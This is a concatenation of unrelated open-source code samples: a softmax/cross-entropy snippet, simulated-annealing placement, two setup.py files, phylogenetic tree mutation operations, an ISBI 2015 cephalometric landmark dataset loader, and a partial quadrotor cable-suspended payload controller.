sample i (the entry for the true class equals 1) and ai = softmax(y_hat)[argmax(yi)], i.e. the softmax value at the
index of the true label.
'''
def softmax(x):
sum_raw = np.sum(np.exp(x), axis=-1)
x1 = np.ones(np.shape(x))
for i in range(np.shape(x)[0]):
x1[i] = np.exp(x[i]) / sum_raw[i]
return x1
def get_loss(y: np.ndarray, y_hat: np.ndarray):
    res = 0.
    mat_val = softmax(y_hat)
    print('mat_val:', mat_val)
    # cross entropy: negative sum over all elements, matching the formula above
    res = -np.sum(y * np.log(mat_val))
    return res
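# Worked check of the formula above (values mirror the first row of the
# commented-out example below; the expected value is approximate):
#   y = np.array([[0, 1, 0]]); y_hat = np.array([[0.9, 0.1, 1.0]])
#   get_loss(y, y_hat)  # cross entropy = -ln(softmax(y_hat)[0, 1]) ≈ 1.74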
# y=np.array([[0,1,0],[0,1,0]])
# y_hat=np.array([[0.9,0.1,1],[0.2,0.8,2]])
# print(np.argmax(y,axis=1))
# print(get_loss(y,y_hat))
# loss=tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=y_hat))
import matplotlib.pyplot as plt
x=[]
x2=[]
x3=[]
y=[]
for i in range(1000):
x.append(np.floor(np.random.normal(8400,200)))
x2.append(np.floor(np.random.uniform(6800,8400)))
x3.append(np.floor(np.random.poisson(8400)))
plt.plot(x)
plt.show()
plt.plot(x2)
plt.show()
plt.plot(x3)
plt.show()
def printX(x):
x=np.array(x)
print(np.max(x), np.min(x), np.mean(x), np.std(x))
printX(x)
printX(x2)
printX(x3)
# with tf.Session() as sess:
# loss_val=sess.run(loss)
# print(loss_val) |
the-stack_0_6460 | import random
import math
import copy
from prj4_data import *
def GetRandomVacancy(L):
x = random.randint(0, L.xlim-1)
y = random.randint(0, L.ylim-1)
while L.layout[x][y] != None:
x = random.randint(0, L.xlim-1)
y = random.randint(0, L.ylim-1)
return x, y
def RandomPlacement(L):
for k,v in L.AllCells.items():
x, y = GetRandomVacancy(L)
L.layout[x][y] = k
v.loc = [x, y]
def SimulatedAnnealing(L, Tstart, Tend, iterPerT):
T = Tstart
alpha = 0.95
    iterEst = math.log(Tend/Tstart, 0.85) # estimate of the total number of cooling steps
print('estimated annealing iterations:', iterEst * iterPerT)
iOuterLoop = 0
while T > Tend:
cost = [L.getCost()]
accepted = list()
        # annealing sweep at the current temperature
for iInnerLoop in range(iterPerT):
flag = random.randint(0, 1)
Lnew = copy.deepcopy(L)
            # move: relocate a random cell to a random vacant site
if flag:
tIndex = random.choice(list(Lnew.AllCells.keys()))
Lnew.move(tIndex, GetRandomVacancy(Lnew))
            # swap: exchange the positions of two random cells
else:
t1Index = random.choice(list(Lnew.AllCells.keys()))
t2Index = random.choice(list(Lnew.AllCells.keys()))
while t2Index == t1Index:
t2Index = random.choice(list(Lnew.AllCells.keys()))
Lnew.swap(t1Index, t2Index)
cost.append(Lnew.getCost())
delta = cost[-1] - cost[-2]
if random.random() < math.exp(-delta/T):
L = Lnew
accepted.append(True)
else:
cost[-1] = cost[-2]
accepted.append(False)
print('temperature:', T)
print('cost:', cost[1:])
print('accepted:', accepted)
        # lower the temperature (the cooling rate alpha is adapted over the schedule)
if iOuterLoop < iterEst * 0.25:
alpha -= (0.95 - 0.8) / (iterEst / 4)
elif iOuterLoop > iterEst * 0.75:
alpha += (0.95 - 0.8) / (iterEst / 4)
if alpha < 0.8:
alpha = 0.8
elif alpha > 0.95:
alpha = 0.95
T *= alpha
iOuterLoop += 1
return L
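# Hedged usage sketch (the layout constructor below is an assumption; any object
# from prj4_data exposing xlim/ylim/layout/AllCells/getCost/move/swap works):
#   L = Layout(...)                  # hypothetical constructor
#   RandomPlacement(L)               # random initial placement
#   L = SimulatedAnnealing(L, Tstart=100.0, Tend=0.1, iterPerT=20)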
|
the-stack_0_6461 | #!/usr/bin/env python
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import os
import platform
import subprocess
import sys
import setuptools
from setuptools import find_packages, setup
from setuptools.command.install import install
from setuptools.command.test import test
# When executing the setup.py, we need to be able to import ourselves, this
# means that we need to add the src/ directory to the sys.path.
base_dir = os.path.dirname(__file__)
src_dir = os.path.join(base_dir, "src")
sys.path.insert(0, src_dir)
about = {}
with open(os.path.join(src_dir, "activeledgersdk", "__about__.py")) as f:
exec(f.read(), about)
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__summary__"],
long_description=long_description,
license=about["__license__"],
url=about["__uri__"],
author=about["__author__"],
author_email=about["__email__"],
package_dir={"": "src"},
packages=find_packages(where="src"),
include_package_data=True
)
|
the-stack_0_6462 | import distutils
import os.path
from setuptools import setup
from setuptools.command.install import install as _install
PTH = (
'try:\n'
' import future_annotations\n'
'except ImportError:\n'
' pass\n'
'else:\n'
' future_annotations.register()\n'
)
class install(_install):
def initialize_options(self):
_install.initialize_options(self)
# Use this prefix to get loaded as early as possible
name = 'aaaaa_' + self.distribution.metadata.name
contents = f'import sys; exec({PTH!r})\n'
self.extra_path = (name, contents)
def finalize_options(self):
_install.finalize_options(self)
install_suffix = os.path.relpath(
self.install_lib, self.install_libbase,
)
if install_suffix == '.':
distutils.log.info('skipping install of .pth during easy-install')
elif install_suffix == self.extra_path[1]:
self.install_lib = self.install_libbase
distutils.log.info(
"will install .pth to '%s.pth'",
os.path.join(self.install_lib, self.extra_path[0]),
)
else:
raise AssertionError(
'unexpected install_suffix',
self.install_lib, self.install_libbase, install_suffix,
)
setup(cmdclass={'install': install})
|
the-stack_0_6463 | from Node import Node
import numpy
class Operation(object):
BACK_MUTATION = 0
DELETE_MUTATION = 1
SWITCH_NODES = 2
PRUNE_REGRAFT = 3
@classmethod
def tree_operation(cls, tree, operation, k, gamma, max_deletions):
if operation == cls.BACK_MUTATION:
return cls.add_back_mutation(tree, k, gamma, max_deletions)
elif operation == cls.DELETE_MUTATION:
return cls.mutation_delete(tree)
elif operation == cls.SWITCH_NODES:
return cls.switch_nodes(tree)
elif operation == cls.PRUNE_REGRAFT:
return cls.prune_regraft(tree)
else:
raise SystemError("Something has happened while choosing an operation")
@classmethod
def add_back_mutation(cls, tree, k, gamma, max_deletions):
"""Adds a new random backmutation to the given tree"""
# gets a list of all the nodes from cache
cached_nodes = tree.phylogeny.get_cached_content()
keys = list(cached_nodes.keys())
# select a random node
# root has no parent, hence cannot add a back mutation
# keep trying till we find a suitable node
node = numpy.random.choice(keys)
while node.up == None or node.up.up == None:
node = numpy.random.choice(keys)
        # if the losses list has reached its maximum, we cannot proceed
if (len(tree.losses_list) >= max_deletions):
return 1
# selecting possible node candidates (every ancestor)
candidates = [p for p in node.iter_ancestors() if (p.loss == False) and (p.mutation_id != -1)]
if len(candidates) == 0:
return 2
# selecting one random ancestor, based on gamma probabilities
found = False
while not found and len(candidates) > 0:
candidate = numpy.random.choice(candidates)
candidates.remove(candidate)
if numpy.random.uniform() < gamma[candidate.mutation_id]:
found = True
if not(found):
return 3
# Ensuring we have no more than k mutations per mutation type
if (tree.k_losses_list[candidate.mutation_id] >= k):
return 4
# If the mutation is already lost in the current tree, no way to remove it again
if (node.is_mutation_already_lost(candidate.mutation_id)):
return 5
        # If there are already k mutations of candidate mutation_id
if (tree.k_losses_list[candidate.mutation_id] >= k):
return 6
node_deletion = Node(candidate.name, None, candidate.mutation_id, True)
tree.losses_list.append(node_deletion)
tree.k_losses_list[node_deletion.mutation_id] += 1
# saving parent before detaching
par = node.up
current = node.detach()
par.add_child(node_deletion)
node_deletion.add_child(current)
return 0
@classmethod
def mutation_delete(cls, tree):
"""Delete a random mutation from the given tree"""
if (len(tree.losses_list) == 0):
return 1
node = numpy.random.choice(tree.losses_list)
node.delete_node(tree)
return 0
@classmethod
def switch_nodes(cls, tree):
"""Switch two random nodes of the given tree"""
nodes = tree.phylogeny.get_cached_content()
keys = list(nodes.keys())
u = None
while (u == None or u.up == None or u.loss):
u = numpy.random.choice(keys)
keys.remove(u)
keys = list(nodes.keys())
v = None
while (v == None or v.up == None or v.loss or u.name == v.name):
v = numpy.random.choice(keys)
keys.remove(v)
u.swap(v)
return 0
@classmethod
def prune_regraft(cls, tree):
"""Prune-regraft two random nodes of the given tree"""
nodes_list = tree.phylogeny.get_cached_content()
prune_res = -1
while prune_res != 0:
keys = list(nodes_list.keys())
u = None
while (u == None or u.up == None or u.loss):
u = numpy.random.choice(keys)
keys.remove(u)
keys = list(nodes_list.keys())
v = None
while (v == None or v.up == None or v.loss):
v = numpy.random.choice(keys)
keys.remove(v)
prune_res = u.prune_and_reattach(v)
return 0
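# Hedged usage sketch (the tree, gamma vector and parameter values below are
# assumptions; the tree must expose phylogeny, losses_list and k_losses_list
# as used above):
#   op = numpy.random.randint(0, 4)
#   result = Operation.tree_operation(tree, op, k=3, gamma=gamma, max_deletions=10)
#   # result == 0 means the chosen operation was applied successfully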
|
the-stack_0_6466 | # -*- coding: utf-8 -*-
#
# MPA Authors. All Rights Reserved.
#
""" Dataset for ISBI_2015"""
# Import global packages
import os
import numpy as np
import torch
import torch.nn.functional as F
import torchvision
from PIL import Image
import cv2
from matplotlib import pyplot as plt
# Kornia library for data augmentation
from kornia import augmentation as K
import kornia.augmentation.functional as KF
import kornia.augmentation.random_generator as KRG
# Import local functions
from evaluation import upscale_coordinates
# Import global constants
from constants import *
class ISBIDataSet(object):
""" Read ISBI2015 data and return images and labels.
Format is:
image (torch.tensor),
        label(dictionary): {'ans_x': ANnotation of Senior X coordinate},
                           {'ans_y': ANnotation of Senior Y coordinate},
                           {'ans_c': ANnotation of Senior Classification},
                           {'anj_x': ANnotation of Junior X coordinate},
                           {'anj_y': ANnotation of Junior Y coordinate},
                           {'anj_c': ANnotation of Junior Classification}
Note:
1. We used the average of 'ans' and 'anj' as ground truth
2. Thus, the ground truth of facial classification is calculated from
evaluation of 'ana' not from annotation files.
"""
def __init__(self, data_root, mode, img_h, img_w, transforms, y_ch=False):
""" Transforms and downsampling are determined with 'transforms'
        If transforms=ToTensor(), the image is not downsampled and 'img_h'
        and 'img_w' are ignored.
        If transforms=None, the image is downsampled to ('img_h', 'img_w').
Args:
data_root(str): Path of ISBI2015 dataset.
mode(str): Dataset mode in [train, test1, test2].
img_h(int): Height of image (used for downsampling)
img_w(int): Width of image (used for downsampling)
transforms(torchvision.transforms): Transforms to be applied. If it is
'None', then torchvision.transforms.ToTensor() is applied.
            y_ch(bool): Use the Y-channel image as input (True) or RGB (False).
"""
if mode == 'train':
self.data_prefix = "TrainingData"
elif mode == 'test1':
self.data_prefix = "Test1Data"
elif mode == 'test2':
self.data_prefix = "Test2Data"
else:
assert('Error in mode')
self.img_size = (img_h, img_w)
self.img_scale = (img_h / RAW_IMG_H, img_w / RAW_IMG_W)
self.transforms = transforms
self.y_ch = y_ch
if transforms is not None:
self.transforms = transforms
else:
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.Resize(self.img_size),
torchvision.transforms.ToTensor(),]
)
self.data_root = data_root
self.img_root = os.path.join(
os.path.join(self.data_root, "RawImage"),
self.data_prefix
)
self.ans_root = os.path.join(
os.path.join(self.data_root, "AnnotationsByMD/senior"),
self.data_prefix
)
self.anj_root = os.path.join(
os.path.join(self.data_root, "AnnotationsByMD/junior"),
self.data_prefix
)
self.img_list = list(sorted(os.listdir(self.img_root)))
self.ans_list = list(sorted(os.listdir(self.ans_root)))
self.anj_list = list(sorted(os.listdir(self.anj_root)))
def __getitem__(self, idx):
""" We used the average of 'ans' and 'anj' as ground truth ('ana') and
to fit to the scale, we also calculate 'ana_fs' that indicate the 'ana' in
the down sampled images.
The shape of ground-truth data is
ann = {
'ans_x': Annotation of x coordinate by senior in text file
'ans_y': Annotation of y coordinate by senior in text file
'anj_x': Annotation of x coordinate by junior in text file
'anj_y': Annotation of x coordinate by junior in text file
'ana_x': Average of 'ans_x' and 'anj_x'
'ana_y': Average of 'ans_y' and 'anj_y'
'ans_x_fs': Scaled 'ans_x' for down sampled input image
'ans_y_fs': Scaled 'ans_y' for down sampled input image
'anj_x_fs': Scaled 'anj_x' for down sampled input image
'anj_y_fs': Scaled 'anj_y' for down sampled input image
'ana_x_fs': Scaled 'ana_x' for down sampled input image
'ana_y_fs': Scaled 'ana_y' for down sampled input image
'ans_c': Annotation of facial class type by senior in text file
'anj_c': Annotation of facial class type by junior in text file
'ana_c': (deprecated) Set as the same as 'ans_c'
}
"""
# load images ad masks
img_path = os.path.join(self.img_root, self.img_list[idx])
ans_path = os.path.join(self.ans_root, self.ans_list[idx])
anj_path = os.path.join(self.anj_root, self.anj_list[idx])
pil_img = Image.open(img_path).convert("RGB")
img = self.transforms(pil_img) # Load image
with open(ans_path) as ans_f: # Read lines without '\n'
ans = [ans_l.rstrip() for ans_l in ans_f]
with open(anj_path) as anj_f: # Read lines without '\n'
anj = [anj_l.rstrip() for anj_l in anj_f]
# Annotation
ann = {}
# Annotation by Senior. (_fs means 'fixed scale')
ann["ans_x"] = np.array([(float(xy.split(',')[0])) for xy in ans[:NUM_LM]])
ann["ans_y"] = np.array([(float(xy.split(',')[1])) for xy in ans[:NUM_LM]])
ann["ans_x_fs"] = self.img_scale[1] * ann["ans_x"]
ann["ans_y_fs"] = self.img_scale[0] * ann["ans_y"]
# Annontation by Junior.
ann["anj_x"] = np.array([(float(xy.split(',')[0])) for xy in anj[:NUM_LM]])
ann["anj_y"] = np.array([(float(xy.split(',')[1])) for xy in anj[:NUM_LM]])
ann["anj_x_fs"] = self.img_scale[1] * ann["anj_x"]
ann["anj_y_fs"] = self.img_scale[0] * ann["anj_y"]
# Averaged annotation.
ann["ana_x"] = 0.5 * (ann["ans_x"] + ann["anj_x"])
ann["ana_y"] = 0.5 * (ann["ans_y"] + ann["anj_y"])
ann["ana_x_fs"] = 0.5 * (ann["ans_x_fs"] + ann["anj_x_fs"])
ann["ana_y_fs"] = 0.5 * (ann["ans_y_fs"] + ann["anj_y_fs"])
# Face type
ann["ans_c"] = np.pad(np.array([int(c) for c in ans[NUM_LM:]]), (0, 11))
ann["anj_c"] = np.pad(np.array([int(c) for c in anj[NUM_LM:]]), (0, 11))
ann["ana_c"] = ann["ans_c"]
if self.y_ch == False:
return img, ann
else:
y_ch_img = self.transforms(pil_img.convert("YCbCr").getchannel('Y'))
return img, ann, y_ch_img
def __len__(self):
return len(self.img_list)
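# Hedged usage sketch (the data path, image size and batch size below are
# assumptions, not values taken from this repository):
#   dataset = ISBIDataSet("data/ISBI2015", "train", img_h=800, img_w=640,
#                         transforms=None, y_ch=False)
#   img, ann = dataset[0]
#   loader = torch.utils.data.DataLoader(dataset, batch_size=2, shuffle=True)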
def to_numpy_image(tensor_img):
return tensor_img.transpose(1, 3).transpose(1, 2).cpu().numpy()
def to_tensor_image(np_img):
return torch.tensor(np.transpose(np_img, (0, 3, 1, 2)))
def to_numpy_arr(tensor_arr):
return tensor_arr.cpu().numpy()
def to_tensor_arr(np_arr):
return torch.tensor(np_arr)
def vis_isbi(img_batch, pred_batch, x, y, c, radius, font_scale, txt_offset):
""" Visualize predicted (or ground truth) landmark positions as circle
in the input images.
Args:
img_batch (torch.tensor): Raw input image from ISBI2015
pred_batch (torch.tensor): Image used for the prediction (e.g. down sampled)
x (torch.tensor): (Predicted) landmark positions (x coordinate)
y (torch.tensor): (Predicted) landmark positions (y coordinate)
c (torch.tensor): (Deprecated) (predicted) facial class type
radius (int): Radius of circle of landmark
font_scale (int): Size of landmark text (short names)
txt_offset (int): Offset distance of text from landmark locations
Returns:
vis_img (tensor): Result image
"""
n_batch, img_c, img_h, img_w = img_batch.shape
_, pred_c, pred_h, pred_w = pred_batch.shape
x = ((img_w / pred_w) * to_numpy_arr(x)).astype(np.int)
y = ((img_h / pred_h) * to_numpy_arr(y)).astype(np.int)
num_lm = x.shape[1]
img_batch = to_numpy_image(img_batch)
vis_img = np.zeros_like(img_batch)
for n in range(n_batch):
img = cv2.UMat(img_batch[n])
for i in range(num_lm):
img = cv2.circle(img=img,
center=(x[n, i], y[n, i]),
radius=radius,
color=(1, 0, 0),
thickness=-1,
)
img = cv2.putText(img=img,
text='{}'.format(S_LM_NAME_DICT[i]),
org=(x[n, i] + txt_offset, y[n, i] + txt_offset),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale,
color=(0, 1, 0),
thickness=2,
lineType=cv2.LINE_AA
)
overlayed_img = np.array(img.get())
if len(overlayed_img.shape) == 2: # For gray scale image
vis_img[n,:,:,0] = np.array(img.get())
else:
vis_img[n,:,:,:] = np.array(img.get())
return to_tensor_image(vis_img)
def ann_to_heatmap(img_batch, ksize, sigma, x, y, c):
""" Convert annotation into heatmaps of landmark locations using Gaussian
distribution
Args:
img_batch (torch.tensor): Input image
ksize (int): Size of Gaussian kernel (2 * ksize + 1)
sigma (int): Sigma of Gaussian kernel
x (torch.tensor): Landmark positions (x coordinate)
y (torch.tensor): Landmark positions (y coordinate)
c (torch.tensor): (Deprecated) Facial type
Returns:
gt_heatmap (tensor): Heatmatp of ground truth
"""
n_batch, _, img_h, img_w = img_batch.shape
n_lm = x.shape[1]
x = torch.round(x).int()
y = torch.round(y).int()
g_mask = cv2.getGaussianKernel(2 * ksize + 1, sigma)
g_mask = g_mask * g_mask.transpose()
g_mask = torch.tensor(g_mask / np.max(g_mask))
gt_heatmap = torch.zeros([n_batch, n_lm, img_h, img_w])
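    # NOTE: as written, only a unit impulse (1.0) is placed at each landmark
    # location below; the Gaussian kernel g_mask built above is not applied in
    # this function, so any Gaussian smoothing has to happen downstream.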
for n in range(n_batch):
for i in range(n_lm):
gt_heatmap[n, i, y[n, i], x[n, i]] = 1
return gt_heatmap
def heatmap_to_ann(heatmap_batch):
""" Convert heatmap into series of X,Y coordinate by applying argmax.
Args:
heatmap_batch (torch.tensor)
Returns: Integer coordinates (x, y)
"""
    n_batch, n_lm, img_h, img_w = heatmap_batch.shape
x = torch.zeros([n_batch, n_lm])
y = torch.zeros([n_batch, n_lm])
for n in range(n_batch):
for i in range(n_lm):
raw_idx = heatmap_batch[n, i, :, :].argmax()
            y[n, i] = raw_idx // img_w
            x[n, i] = raw_idx - (y[n, i] * img_w)
return x.int(), y.int()
def augmentation(
img_batch,
heatmap_batch,
x,
y,
degrees,
scale,
brightness,
contrst,
saturation,
hue,
same_on_batch):
""" Augment cephalogram and heatmap with following step.
1. Rotation: Use image center or porion as ceter of rotation.
2. Scaling: Use image center or porion as ceter of rotation.
3. Color jittering: Perturb brightness, contrast, stauration and hue.
Args:
img_batch (torch.tensor): Cephalogram from ISBI2015.
Shape = [n_batch, n_ch, height, width]
heatmap_batch (torch.tensor): GT heatmap.
Shape = [n_batch, n_ch, height, width]
x (torch.tensor): X coordinates of landmarks
Shape = [n_batch, NUM_LM]
y (torch.tensor): Y coordinates of landmarks
Shape = [n_batch, NUM_LM]
degrees (list): Range of random rotation.
Shape = [int, int]
scale (int): Range of random scale.
brightness (int): Range of random brightness.
contrst (int): Range of random contrast.
stauration (int): Range of random stauration.
hue (int): Range of random hue.
same_on_batch(bool): Same on batch.
Returns:
aug_img (torch.tensor): Augmented cephalograms.
Shape = [n_batch, n_ch, height, width]
aug_heatmap (torch.tensor): Augmented heatmaps.
Shape = [n_batch, n_ch, height, width]
aug_x (torch.tensor): X coordinates of augmented cephalograms' landmarks
scaled as ISBI2015
Shape = [n_batch, NUM_LM]
aug_y (torch.tensor): Y coordinates of augmented cephalograms' landmarks
scaled as ISBI2015
Shape = [n_batch, NUM_LM]
aug_x_fs (torch.tensor): X coordinates of augmented cephalograms' landmarks
scaled as heatmap
Shape = [n_batch, NUM_LM]
aug_y_fs (torch.tensor): Y coordinates of augmented cephalograms' landmarks
scaled as heatmap
Shape = [n_batch, NUM_LM]
"""
n_batch, img_c, img_h, img_w = img_batch.shape
aff_degrees = degrees
aff_scale = scale
affine_params = KRG.random_affine_generator(
batch_size=n_batch,
height=img_h,
width=img_w,
degrees=aff_degrees,
scale=aff_scale,
same_on_batch=same_on_batch,
)
color_jitter_params = KRG.random_color_jitter_generator(
batch_size=n_batch,
brightness=brightness,
contrast=contrst,
saturation=saturation,
hue=hue,
same_on_batch=same_on_batch)
aug_imgs = KF.apply_affine(img_batch, affine_params)
aug_heatmaps = KF.apply_affine(heatmap_batch, affine_params)
aug_x_fs, aug_y_fs = heatmap_to_ann(aug_heatmaps)
aug_x, aug_y = upscale_coordinates(
img_batch=img_batch, x=aug_x_fs, y=aug_y_fs
)
return aug_imgs, aug_heatmaps, aug_x_fs, aug_y_fs, aug_x, aug_y
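# Hedged usage sketch (the ranges below are illustrative assumptions; exact
# range formats depend on the kornia version in use):
#   out = augmentation(img_batch, heatmap_batch, x, y,
#                      degrees=[-10.0, 10.0], scale=[0.9, 1.1],
#                      brightness=0.2, contrst=0.2, saturation=0.2, hue=0.1,
#                      same_on_batch=False)
#   aug_imgs, aug_heatmaps, aug_x_fs, aug_y_fs, aug_x, aug_y = out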
def crop_lm_patches(img_batch, x_c_batch, y_c_batch, ann_batch, pat_sz):
""" Cropping patches for local stage
Args:
img_batch (tensor): Input image
x_c_batch (tensor): Crop center 'x'
y_c_batch (tensor): Crop center 'y'
ann_batch (tensor): Ground truth annotation
pat_sz (int): Side length of patch
Returns:
img_crop_batch_list (tensor): Cropped patch images
ana_x_batch_list (tensor): Landmark coordinates 'x' of patches
ana_y_batch_list (tensor): Landmark coordinates 'y' of patches
"""
img_crop_batch_list = []
ana_x_batch_list = []
ana_y_batch_list = []
# Zero padding for cropping
img_batch = F.pad(img_batch, (pat_sz, pat_sz, pat_sz, pat_sz))
for img_idx in range(img_batch.shape[0]):
img_crop_ch_list = []
ana_x_ch_list = []
ana_y_ch_list = []
# Padding requires offset GT and crop center by pat_sz.
ana_x = int(ann_batch['ana_x'][img_idx]) + pat_sz
ana_y = int(ann_batch['ana_y'][img_idx]) + pat_sz
x_c = int(x_c_batch[img_idx]) + pat_sz
y_c = int(y_c_batch[img_idx]) + pat_sz
# ROI of patch
pat_x_r = slice(x_c - pat_sz, x_c + pat_sz)
pat_y_r = slice(y_c - pat_sz, y_c + pat_sz)
# Cropped image
img_crop = img_batch[img_idx:img_idx + 1, :, pat_y_r, pat_x_r].clone()
img_crop_ch_list.append(img_crop)
# Annotation of patch is
# GT landmark position - crop center + patch_size
ana_x_ch_list.append(torch.tensor([[pat_sz + ana_x - x_c]]))
ana_y_ch_list.append(torch.tensor([[pat_sz + ana_y - y_c]]))
img_crop_batch_list.append(torch.cat(img_crop_ch_list, dim=1))
ana_x_batch_list.append(torch.cat(ana_x_ch_list, dim=1))
ana_y_batch_list.append(torch.cat(ana_y_ch_list, dim=1))
img_crop_batch_list = torch.cat(img_crop_batch_list, dim=0)
ana_x_batch_list = torch.cat(ana_x_batch_list, dim=0)
ana_y_batch_list = torch.cat(ana_y_batch_list, dim=0)
return img_crop_batch_list, ana_x_batch_list, ana_y_batch_list
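# Illustrative call of crop_lm_patches() (tensor names and the annotation
# dictionary keys follow the docstring above; pat_sz=32 is an assumption):
# patch_imgs, patch_x, patch_y = crop_lm_patches(
#     img_batch, x_c_batch, y_c_batch,
#     ann_batch={'ana_x': ana_x_batch, 'ana_y': ana_y_batch},
#     pat_sz=32)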
def vis_patch(img_batch, x, y, c, radius, font_scale, txt_offset, lm_idx):
""" Visualize predicted (or ground truth) landmark positions as circle
in the cropped patches.
Args:
img_batch (torch.tensor): Cropped patch image
x (torch.tensor): (Predicted) landmark positions (x coordinate)
y (torch.tensor): (Predicted) landmark positions (y coordinate)
c (torch.tensor): (Deprecated) (predicted) facial class type
radius (int): Radius of circle of landmark
font_scale (int): Size of landmark text (short names)
txt_offset (int): Offset distance of text from landmark locations
lm_idx (int): Index of landmark to visualize
Returns:
vis_img (tensor): Result image
"""
n_batch, img_c, img_h, img_w = img_batch.shape
x = to_numpy_arr(x).astype(int)
y = to_numpy_arr(y).astype(int)
num_lm = x.shape[1]
img_batch = to_numpy_image(img_batch)
vis_img = np.zeros_like(img_batch)
for n in range(n_batch):
img = cv2.UMat(img_batch[n])
img = cv2.circle(img=img,
center=(x[n], y[n]),
radius=radius,
color=(1, 0, 0),
thickness=-1,
)
img = cv2.putText(img=img,
text='{}'.format(S_LM_NAME_DICT[lm_idx]),
org=(x[n] + txt_offset, y[n] + txt_offset),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale,
color=(0, 1, 0),
thickness=2,
lineType=cv2.LINE_AA
)
overlayed_img = np.array(img.get())
if len(overlayed_img.shape) == 2:
vis_img[n,:,:,0] = overlayed_img
else:
vis_img[n,:,:,:] = overlayed_img
return to_tensor_image(vis_img) |
the-stack_0_6467 | #!/usr/bin/python3
import numpy as np
from rotor_tm_utils.vec2asym import vec2asym
import scipy.linalg as LA
from rotor_tm_utils.vee import vee
from rotor_tm_utils.RPYtoRot_ZXY import RPYtoRot_ZXY
from rotor_tm_utils import utilslib
import scipy
from scipy.spatial.transform import Rotation as tranrot
import json
class controller:
def __init__(self):
self.gd = np.zeros((0,0), dtype=float)
self.icnt = None
# for hover_controller
self.last_t = None
def cooperative_attitude_controller(self, qd, qn, params):
# DESCRIPTION:
# Attitude controller for cooperative cable suspended payload and MAV(s)
# This function is used as a helper function in cooperative_suspended_payload_controller()
# to compute F, M, and Rot_des
# INPUTS:
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
# 'yaw_des' float NA desired payload yaw, set to 0.0 currently
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# qn - an integer identifying the id of the current MAV the controller is controlling
# params - a read_params class object containing all MAV parameters
# OUTPUTS:
# F - a 3 by 1 vector describing thrust
# M - a 3 by 1 vector describing Moment
# Rot_des - a rotation matrix describing desired rotation
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
# Parameter Initialization
m = params.mass
l = params.l
e3 = np.array([[0],[0],[1]])
# State Feedback
xi = qd[qn]["xi"]
xidot = qd[qn]["xidot"]
rot = qd[qn]["rot"]
# Cable Direction Tracking Control
mu_des = qd[qn]["mu_des"]
xi_des = np.divide(-mu_des, np.linalg.norm(mu_des))
xi_des_dot = np.array([[0.0],[0.0],[0.0]])
w_des = np.cross(xi_des, xi_des_dot, axisa=0, axisb=0).T
w = np.cross(xi, xidot, axisa=0, axisb=0).T
mu = np.matmul(qd[qn]["xixiT"], mu_des)
e_xi = np.cross(xi_des, xi, axisa=0, axisb=0).T
e_w = w + np.cross(xi, np.cross(xi, w_des, axisa=0, axisb=0).T, axisa=0, axisb=0).T
u_parallel = mu + m*l*np.linalg.norm(w)**2*xi + np.matmul(m*qd[qn]["xixiT"], qd[qn]["attach_accel"])
u_perpendicular = -m*l*np.cross(xi, params.Kxi @ e_xi + params.Kw @ e_w + (xi.T @ w_des) * xi_des_dot, axisa=0, axisb=0).T - m*np.cross(xi, np.cross(xi, qd[qn]["attach_accel"], axisa=0, axisb=0).T, axisa=0, axisb=0).T
Force = u_parallel + u_perpendicular
F = Force.T @ np.matmul(rot,e3)
# Desired Attitude and Angular Velocity
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:, 2:3] = Z_body_in_world
Y_unit = np.array([[-np.sin(yaw_des)], [np.cos(yaw_des)], [0]])
X_body_in_world = np.cross(Y_unit, Z_body_in_world, axisa=0, axisb=0).T
X_body_in_world = X_body_in_world/np.linalg.norm(X_body_in_world)
Rot_des[:,0:1] = X_body_in_world
Y_body_in_world = np.cross(Z_body_in_world, X_body_in_world, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
p_des = np.array([[0.0]])
q_des = np.array([[0.0]])
r_des = yawdot_des*Z_body_in_world[2:3, :]
qd[qn]["rot_des"] = Rot_des
qd[qn]["omega_des"] = np.vstack((p_des, q_des, r_des))
# Quadrotor Attitude Control
M = self.quadrotor_attitude_controller(qd[qn], params)
return F, M, Rot_des
def quadrotor_attitude_controller(self, qd, params):
# DESCRIPTION:
# Attitude controller for a single cable suspended MAV and payload
# This function is used as a helper function in cooperative_attitude_controller() to compute M
# INPUTS:
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
